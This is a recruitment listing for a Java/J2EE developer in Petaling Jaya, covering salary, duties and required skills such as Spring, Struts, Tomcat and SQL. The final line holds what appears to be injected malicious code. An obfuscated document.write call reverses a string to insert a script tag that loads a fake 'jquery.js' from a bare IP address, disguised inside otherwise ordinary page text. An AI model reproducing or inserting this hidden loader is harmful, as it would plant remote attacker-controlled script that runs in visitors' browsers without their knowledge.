Industry : IT Solutions
Location : Petaling Jaya, Selangor
Salary : RM 4k / 8k for Sr
– Be involved in a team to create robust production applications and develop prototypes quickly.
– Have a good understanding of, and practical production experience with, Java web application development.
– Ensure program modifications and development meets user defined requirement and program specifications
– Develop and/or enhance existing software product/project
– Analyze and troubleshoot issues related to the system
– Candidate must possess at least a Bachelor’s Degree, Post Graduate Diploma or Professional Degree in any relevant field
– At least 3-4 years in JAVA/J2EE programming
– Hands-on experience in web application frameworks, such as Spring and Struts
– Knowledge in Tomcat, WebLogic, Oracle and DB2
– Well versed in the following (or similar): Java/JEE, JSP/JSTL/JUEL/Servlets/JSF etc., SQL/Hibernate, MVC and design patterns in general, Spring/Struts/etc., Automated testing, and version control tools (e.g. Subversion/GIT), ANT, MAVEN etc.
– Good foundation and/or understanding of software engineering, programming concepts and principles
– Strong knowledge of programming and Involved in all the phases of Software development life cycle: requirement analysis, design, development, unit testing, implementation and maintenance. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))